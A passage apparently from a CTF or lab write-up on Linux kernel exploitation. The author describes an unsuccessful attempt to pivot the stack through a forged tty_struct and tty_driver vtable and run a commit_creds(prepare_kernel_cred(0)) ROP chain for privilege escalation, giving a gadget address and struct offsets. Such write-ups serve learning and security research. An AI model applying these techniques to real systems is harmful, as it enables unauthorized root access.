Everything works but I wanted to control RIP with a rop chain. To do that I tried to find a stack pivot gadget to make rsp = address of book2, and write inside book2 a rop chain that called commit_cred(prepare_kernel_creds(0)). I wasn’t able to find such gadget 😐.

tty_driver remove

There is this gadget 0xffffffff816467dd : push rdi ; pop rsp ; imul esp, dword ptr [rdx + 0x72], 0x616cef89 ; retf that maybe could be used to stack pivot. To call correctly this gadget I tried to call the remove operations with close(ptmx). I set as tty_driver ptr inside tty_struct = &book2 + 256, +256 because in the first 256 bytes there is the tty_operations fake vtable. Then I copied a a fake tty_driver struct inside and changed the ops to point to next_ptr = &book2. This is needed because the remove operation is called from the tty_driver, not the tty_struct (https://elixir.bootlin.com/linux/v5.10.38/source/drivers/tty/tty_io.c#L1324). However I get a pagefault after the push rdi, I don’t know why 😐.